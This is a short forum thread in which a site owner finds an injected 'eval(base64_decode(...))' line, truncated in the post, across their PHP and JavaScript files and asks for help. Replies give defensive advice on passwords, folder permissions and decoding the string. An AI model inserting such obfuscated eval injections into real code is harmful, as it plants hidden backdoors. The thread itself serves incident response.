SitePoint Sponsor

User Tag List

Results 1 to 4 of 4
  1. #1
    SitePoint Addict
    Join Date
    Sep 2008
    Posts
    235
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    php decode hacked my site

    i found a problem on my site and when i compare the files on the server with my local files i found that every page (*.js or *.php) has this line on it
    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC
    or a javascript line


    so i knew that my site has been hacked..
    so
    1 - i want to know how to prevent anyone to hack my site?
    i made on every textfield or textarea on posting or getting it the htmlspecialcharacter($_POST['name'])

    is this true? and can it help me?

    2- how did anyone hack my site??

    3- how i can know what does this code mean???

    thanks in advance and have a nice day

  2. #2
    SitePoint Addict
    Join Date
    May 2006
    Location
    Amsterdam
    Posts
    206
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    There are many possibilities and there's a lot of work to do ... Just as a quick check-list, have you

    1. Changed the passwords for accessing your site: ftp, mysql, any other password protected services?
    2. Made sure no folder in your doc_root (public_html or www usually) is set to 777, make sure it's 755?
    3. stopped processing any forms on your site?

    There are many ways to crack a site. Here are a few of off the top-of-my-head:
    • folders with 777 privileges
    • forms that are not properly sanitized

    To look at the base64 encoded code you'd have to echo it in its decoded form. I believe you could put it into a string and echo it. Get rid of the eval() part, that's what is running it as PHP code. Also, this blog may help http://shiflett.org/

  3. #3
    SitePoint Wizard frank1's Avatar
    Join Date
    Oct 2005
    Posts
    1,392
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by danNL View Post
    [*]Made sure no folder in your doc_root (public_html or www usually) is set to 777, make sure it's 755?
    There are many ways to crack a site. Here are a few of off the top-of-my-head:[*]folders with 777 privileges

    can u illustrate what does it mean?
    i mean do u mean that people might be able to upload php files in there..?

    and image folder (support logo folder) is 777
    how could it cause a site hack...?

  4. #4
    SitePoint Addict
    Join Date
    May 2006
    Location
    Amsterdam
    Posts
    206
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •